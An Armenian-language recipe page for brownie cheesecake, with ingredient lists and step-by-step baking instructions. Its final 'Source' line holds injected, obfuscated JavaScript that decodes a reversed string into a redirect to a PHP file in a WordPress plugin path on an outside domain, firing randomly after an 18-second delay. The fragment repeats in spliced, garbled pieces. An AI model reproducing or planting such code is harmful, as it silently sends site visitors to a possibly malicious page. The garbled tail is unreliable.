Ինչպես պատրաստել Բրաունի թխվածք կրեմ-պանրով /չիզքեյք/

Սովորական տորթերը համեղ են և տարածված։ Բայց ինչու չփորձել ավելացնել նոր գույներ խոհանոցում և փորձել մի փոքր սանդղակը բարձրացնել՝ պատրաստելով  անկրկնելի համով՝ Բրաունի կրեմ-պանրով թխվածք կամ ինչպես հայտնի է՝ Բրաունի չիզքեյք։ Այն հայտնի ամերիկյան թխվածք է։ Առաջին հայացքից թվում է, թե բարդ է պատրաստելը, սակայն դա այնքան էլ այդպես չէ, իսկ Բրաունիի համը տարբերվում է մյուս թխվածքներից իր յուրահատկությամբ։ Ահա այն անհրաժեշտ պարագաները, որոնք պետք կգան ձեզ՝ այն պատրաստելու համար։

Բաղադրիչներ

Թխվածքաբլիթի համար՝

  • շոկոլադ սև- 100 գր (առնվազն 65 %)
  • կարագ- 50 գր
  • շաքարավազ- 70 գր
  • ձու- 1 հատ
  • ալյուր- 20 գր
  • փխրեցուցիչ- 0,5 թ/գդ

Կրեմի համար՝

  • կաթնաշոռ- 130 գր
  • խտացրած կաթ- 30 գր

 

Պատրաստման եղանակ

  1. Պատրասում ենք թխվածքաբլիթը: Ձուն խառնում ենք շաքարավազի հետ և հարում առնվազն 10 րոպե, որպեսզի ստացվի սպիտակ փքված զանգված:
  2. Ալյուրն ու փխրեցուցիչը լցնում ենք ձվային զանգվածի մեջ:
  3. Այնուհետև այլ ամանի մեջ խառնում ենք կարագն ու շոկոլադը և հալեցնում գոլորշու վրա կամ միկրոալիքային վառարանում:
  4. Ձվային զանգվածին անընդհատ հարելով ավելացնում ենք շոկոլադի ու կարագի խառնուրդը:
  5. Խիտ խմորը լցնում ենք կլոր գլխադիրով հրուշային պարկի մեջ: Տապակի մեջ յուղաթուղթ ենք փռում և խմորը ճզմելով՝ տապակի մեջ իրարից հեռու շրջաններ ենք ձևավորում:
  6. Թխում ենք 180 աստիճան տաքացրած ջեռոցում: Հենց որ թխվածքաբլիթը ճաքճքում է հանում ենք ջեռոցից: Թխվելու համար անհրաժեշտ է մոտավորապես 7 րոպե:
  7. Քանի դեռ թխվածքաբլիթը սառում է, պատրաստում ենք կրեմը: Կաթնաշոռն ու խտացրած կաթը միասին հարում ենք մինչև համասեռ զանգված ստանալը: Եթե կրեմը ջրիկ է ստացվում, մի փոքր ժելատին ենք ավելացնում (խտացրած կաթի փոխարեն կաթնաշոռի հետ կարելի է խառնել շաքարի փոշի):
  8. Կաթնաշոռային կրեմը քսում ենք թխվածքաբլիթին և ծածկում մեկ այլ թխվածքաբլիթով:
    Բրաունին պահում ենք սառնարանում:

Համոզված ենք, շատ համեղ է ստացվել։ Բարի ախորժակ^^

Աղբյուր՝ $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-make-simple-brownie-cheesecake/”>NewWomen